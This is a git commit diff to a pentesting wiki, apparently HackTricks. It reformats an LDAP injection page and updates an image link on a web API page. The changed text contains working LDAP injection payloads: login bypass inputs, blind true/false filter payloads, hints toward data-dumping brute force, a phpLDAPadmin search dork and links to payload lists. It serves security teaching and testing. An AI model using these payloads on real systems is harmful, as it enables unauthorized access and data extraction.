GitBook: [master] 2 pages and 4 assets modified

2021-06-08 21:58:39 +00:00 · 2021-06-08 21:58:39 +00:00 · a24d4e91d6
parent c2b98f8fb4
commit a24d4e91d6
6 changed files with 32 additions and 15 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/pentesting-web/ldap-injection.md
+++ b/pentesting-web/ldap-injection.md
@ -27,30 +27,28 @@
 **\(\|\)** = Absolute FALSE
 For example:  
-\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\)  
+`(&(!(objectClass=Impresoras))(uid=s*))  
-\(&\(objectClass=user\)\(uid=\*\)\)
+(&(objectClass=user)(uid=*))`
 You can access to the database, and this can content information of a lot of different types.
 The backups of LDAP uses the extension _ldif_
 **OpenLDAP**: If 2 filters arrive, only executes the first one.  
 **ADAM or Microsoft LDS**: With 2 filters they throw an error.  
 **SunOne Directory Server 5.0**: Execute both filters.
 **It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
-The filter has to start with: _&_ or _\|_  
+The filter has to start with: `&` or `|`  
-Example: _\(&\(directory=val1\)\(folder=public\)\)_
+Example: `(&(directory=val1)(folder=public))`
-\(&\(objectClass=VALUE1\)\(type=Epson\*\)\)  
+`(&(objectClass=VALUE1)(type=Epson*))  
-VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_
+VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
-Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\).
+Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).
 ## Login Bypass
-LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
+LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
 ```bash
 user=*
@ -92,7 +90,7 @@ password=pwd
 ```bash
 username = admin)(!(&(|
 pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
+--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
 ```
 ```bash
@ -107,12 +105,29 @@ password=any
 --> (&(uid=admin)) (| (|) (webpassword=any))
 ```
 ### Lists
 [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)  
-[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)  
+[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
 [LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
 ## Blind LDAP Injection
 You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
 ```bash
 #This will result on True, so some information will be shown
 Payload: *)(objectClass=*))(&objectClass=void
 Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
 ```
 ```bash
 #This will result on True, so no information will be returned or shown
 Payload: void)(objectClass=void))(&objectClass=void
 Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
 ```
 ### Dump data
 You can iterate over the ascii letters, digits and symbols:
 ```bash
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:
 ### **Discover valid LDAP fields**
-LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
+LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
 ```python
 #!/usr/bin/python3
@ -189,5 +204,7 @@ for i in range(50):
 intitle:"phpLDAPadmin" inurl:cmd.php
 ```
 ## More Payloads
 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)
--- a/pentesting/pentesting-web/web-api-pentesting.md
+++ b/pentesting/pentesting-web/web-api-pentesting.md
@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x
 You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
-![](../../.gitbook/assets/image%20%28535%29.png)
+![](../../.gitbook/assets/image%20%28537%29.png)
 ### Check Access